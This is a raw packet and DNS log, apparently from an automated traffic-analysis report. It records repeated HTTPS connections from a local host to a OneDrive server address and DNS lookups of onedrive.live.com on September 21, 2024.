Sep 21, 2024 16:23:31.430645943 CEST  53560  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:31.430824041 CEST  53560  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:31.430881977 CEST  443  53560  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:31.430946112 CEST  53560  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:31.534152031 CEST  53561  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:31.534188986 CEST  443  53561  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:31.534285069 CEST  53561  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:31.534625053 CEST  53561  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:31.534638882 CEST  443  53561  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:32.469198942 CEST  443  53561  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:32.469261885 CEST  53561  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:32.470525026 CEST  53561  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:32.470532894 CEST  443  53561  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:32.470850945 CEST  443  53561  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:32.472194910 CEST  53561  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:32.519403934 CEST  443  53561  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:32.848367929 CEST  443  53561  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:32.849378109 CEST  443  53561  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:32.849492073 CEST  53561  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:32.849788904 CEST  53561  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:32.849802017 CEST  443  53561  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:34.727083921 CEST  53563  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:34.727135897 CEST  443  53563  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:34.727294922 CEST  53563  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:34.727401972 CEST  53563  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:34.727446079 CEST  443  53563  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:34.727602005 CEST  53563  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:34.832864046 CEST  53564  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:34.832901955 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:34.833026886 CEST  53564  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:34.833414078 CEST  53564  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:34.833431959 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:35.731695890 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:35.731786013 CEST  53564  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:35.733299971 CEST  53564  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:35.733309984 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:35.733547926 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:35.734863997 CEST  53564  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:35.779398918 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:36.320600033 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:36.320873022 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:36.320945978 CEST  53564  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:36.321048975 CEST  53564  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:36.321072102 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:36.321088076 CEST  53564  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:36.321094990 CEST  443  53564  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:38.350487947 CEST  53566  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:38.350519896 CEST  443  53566  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:38.350632906 CEST  53566  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:38.350929976 CEST  53566  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:38.350956917 CEST  443  53566  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:38.351003885 CEST  53566  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:38.512954950 CEST  53567  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:38.513011932 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:38.513108969 CEST  53567  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:38.513873100 CEST  53567  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:38.513887882 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:39.334461927 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:39.334642887 CEST  53567  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:39.336055994 CEST  53567  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:39.336072922 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:39.336395025 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:39.337862968 CEST  53567  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:39.379447937 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:39.958199024 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:39.961486101 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:39.961639881 CEST  53567  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:39.961719990 CEST  53567  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:39.961719990 CEST  53567  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:39.961740971 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:39.961780071 CEST  443  53567  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:41.966726065 CEST  53569  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:41.966773033 CEST  443  53569  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:41.966852903 CEST  53569  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:41.966934919 CEST  53569  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:41.967005968 CEST  443  53569  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:41.967057943 CEST  53569  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:42.103127956 CEST  53570  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:42.103161097 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:42.103283882 CEST  53570  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:42.103648901 CEST  53570  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:42.103662968 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:42.828783989 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:42.828885078 CEST  53570  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:42.830183983 CEST  53570  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:42.830199003 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:42.830482960 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:42.831711054 CEST  53570  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:42.879426003 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:43.447241068 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:43.447531939 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:43.447638035 CEST  53570  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:43.447772026 CEST  53570  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:43.447772026 CEST  53570  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:43.447792053 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:43.447803974 CEST  443  53570  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:45.300878048 CEST  53572  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:45.300947905 CEST  443  53572  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:45.301075935 CEST  53572  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:45.301444054 CEST  53572  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:45.301497936 CEST  443  53572  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:45.301562071 CEST  53572  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:45.504187107 CEST  53573  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:45.504228115 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:45.504353046 CEST  53573  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:45.505786896 CEST  53573  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:45.505798101 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:46.101681948 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:46.101994991 CEST  53573  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:46.104542971 CEST  53573  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:46.104573011 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:46.105046988 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:46.106343985 CEST  53573  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:46.147402048 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:46.681401014 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:46.681715965 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:46.681790113 CEST  53573  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:46.681900978 CEST  53573  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:46.681924105 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:46.681938887 CEST  53573  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:46.681948900 CEST  443  53573  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:48.544550896 CEST  53575  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:48.544590950 CEST  443  53575  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:48.544681072 CEST  53575  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:48.544923067 CEST  53575  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:48.544979095 CEST  443  53575  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:48.545042992 CEST  53575  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:48.670192003 CEST  53576  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:48.670223951 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:48.670382023 CEST  53576  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:48.670825005 CEST  53576  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:48.670838118 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:49.289691925 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:49.289854050 CEST  53576  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:49.291420937 CEST  53576  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:49.291431904 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:49.291812897 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:49.293056011 CEST  53576  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:49.335405111 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:49.850903034 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:49.851475000 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:49.851533890 CEST  53576  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:49.851636887 CEST  53576  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:49.851665974 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:49.851690054 CEST  53576  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:49.851696968 CEST  443  53576  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:51.796361923 CEST  53578  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:51.796381950 CEST  443  53578  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:51.796487093 CEST  53578  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:51.797434092 CEST  53578  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:51.797493935 CEST  443  53578  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:51.798500061 CEST  53578  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:51.920689106 CEST  53579  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:51.920711040 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:51.920790911 CEST  53579  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:51.921406031 CEST  53579  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:51.921416998 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:52.518673897 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:52.518754005 CEST  53579  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:52.520091057 CEST  53579  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:52.520113945 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:52.520519018 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:52.521683931 CEST  53579  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:52.567404032 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:53.079168081 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:53.079284906 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:53.079334021 CEST  53579  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:53.083292007 CEST  53579  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:53.083292007 CEST  53579  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:53.083311081 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:53.083324909 CEST  443  53579  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:54.880006075 CEST  53581  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:54.880053997 CEST  443  53581  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:54.880132914 CEST  53581  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:54.880235910 CEST  53581  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:54.880266905 CEST  443  53581  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:54.880321026 CEST  53581  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:54.991374016 CEST  53582  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:54.991405010 CEST  443  53582  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:54.991558075 CEST  53582  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:54.991904020 CEST  53582  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:54.991955996 CEST  443  53582  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:55.693032026 CEST  443  53582  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:55.693248987 CEST  53582  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:55.694688082 CEST  53582  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:55.694705963 CEST  443  53582  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:55.694973946 CEST  443  53582  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:55.696263075 CEST  53582  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:55.743396997 CEST  443  53582  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:56.236582041 CEST  443  53582  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:56.236901045 CEST  443  53582  13.107.137.11  192.168.2.8
Sep 21, 2024 16:23:56.237013102 CEST  53582  443  192.168.2.8  13.107.137.11
Sep 21, 2024 16:23:56.237071991 CEST  53582  443  192.168.2.8  13.107.137.11
                            Sep 21, 2024 16:23:56.237108946 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:56.237121105 CEST53582443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:56.237128019 CEST4435358213.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.114625931 CEST53584443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.114660978 CEST4435358413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.114777088 CEST53584443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.115020990 CEST53584443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.115081072 CEST4435358413.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.115153074 CEST53584443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.284610987 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.284638882 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.284714937 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.285059929 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.285075903 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.869296074 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.870172977 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.871256113 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.871265888 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.871540070 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:58.872730017 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:58.919411898 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:59.421526909 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:59.421636105 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:59.421731949 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:59.477416039 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:59.477447033 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:23:59.477463961 CEST53585443192.168.2.813.107.137.11
                            Sep 21, 2024 16:23:59.477473021 CEST4435358513.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:01.366525888 CEST53587443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.366550922 CEST4435358713.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:01.366636038 CEST53587443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.366770983 CEST53587443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.366802931 CEST4435358713.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:01.366847038 CEST53587443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.517823935 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.517858028 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:01.517951965 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.518346071 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:01.518366098 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:02.180515051 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:02.180659056 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:02.182070971 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:02.182079077 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:02.182317019 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:02.184201002 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:02.227406025 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:03.586579084 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:03.586688042 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:03.586781979 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:03.586895943 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:03.586916924 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:03.586930037 CEST53588443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:03.586935997 CEST4435358813.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:05.336301088 CEST53590443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.336350918 CEST4435359013.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:05.336447001 CEST53590443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.336590052 CEST53590443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.336628914 CEST4435359013.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:05.336843014 CEST53590443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.459408998 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.459459066 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:05.459592104 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.460030079 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:05.460061073 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.045290947 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.046449900 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.047405958 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.047416925 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.047669888 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.049869061 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.095402002 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.923743010 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.923845053 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.923922062 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.924048901 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.924073935 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:06.924088001 CEST53591443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:06.924093008 CEST4435359113.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:08.790440083 CEST53593443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.790482044 CEST4435359313.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:08.790550947 CEST53593443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.790694952 CEST53593443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.790743113 CEST4435359313.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:08.790797949 CEST53593443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.898009062 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.898040056 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:08.898140907 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.898538113 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:08.898550034 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:09.598289967 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:09.598411083 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:09.599793911 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:09.599817038 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:09.600153923 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:09.601372004 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:09.647407055 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:10.156672955 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:10.156759977 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:10.156857967 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:10.159375906 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:10.159377098 CEST53594443192.168.2.813.107.137.11
                            Sep 21, 2024 16:24:10.159404993 CEST4435359413.107.137.11192.168.2.8
                            Sep 21, 2024 16:24:10.159415007 CEST4435359413.107.137.11192.168.2.8
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Sep 21, 2024 16:22:18.557076931 CEST | 53769 | 53 | 192.168.2.8 | 1.1.1.1
                            Sep 21, 2024 16:22:38.913187981 CEST | 53 | 62502 | 162.159.36.2 | 192.168.2.8
                            Sep 21, 2024 16:22:39.434202909 CEST | 50069 | 53 | 192.168.2.8 | 1.1.1.1
                            Sep 21, 2024 16:22:39.441749096 CEST | 53 | 50069 | 1.1.1.1 | 192.168.2.8
                            Sep 21, 2024 16:22:42.526303053 CEST | 57114 | 53 | 192.168.2.8 | 1.1.1.1
                            Sep 21, 2024 16:22:42.706172943 CEST | 53 | 57114 | 1.1.1.1 | 192.168.2.8
                            Sep 21, 2024 16:22:45.347551107 CEST | 56933 | 53 | 192.168.2.8 | 1.1.1.1
                            Sep 21, 2024 16:23:24.352066994 CEST | 64913 | 53 | 192.168.2.8 | 1.1.1.1
                            Sep 21, 2024 16:24:01.508694887 CEST | 50440 | 53 | 192.168.2.8 | 1.1.1.1
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Sep 21, 2024 16:22:18.557076931 CEST | 192.168.2.8 | 1.1.1.1 | 0x7dc0 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:22:39.434202909 CEST | 192.168.2.8 | 1.1.1.1 | 0xdbd | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                            Sep 21, 2024 16:22:42.526303053 CEST | 192.168.2.8 | 1.1.1.1 | 0x32c5 | Standard query (0) | 183.59.114.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                            Sep 21, 2024 16:22:45.347551107 CEST | 192.168.2.8 | 1.1.1.1 | 0x6e3f | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:23:24.352066994 CEST | 192.168.2.8 | 1.1.1.1 | 0xd96f | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:24:01.508694887 CEST | 192.168.2.8 | 1.1.1.1 | 0x4a71 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Sep 21, 2024 16:22:18.566612959 CEST | 1.1.1.1 | 192.168.2.8 | 0x7dc0 | No error (0) | onedrive.live.com | web.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:22:18.566612959 CEST | 1.1.1.1 | 192.168.2.8 | 0x7dc0 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:22:18.566612959 CEST | 1.1.1.1 | 192.168.2.8 | 0x7dc0 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:22:18.566612959 CEST | 1.1.1.1 | 192.168.2.8 | 0x7dc0 | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.137.11 | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:22:18.566612959 CEST | 1.1.1.1 | 192.168.2.8 | 0x7dc0 | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.139.11 | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:22:39.441749096 CEST | 1.1.1.1 | 192.168.2.8 | 0xdbd | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
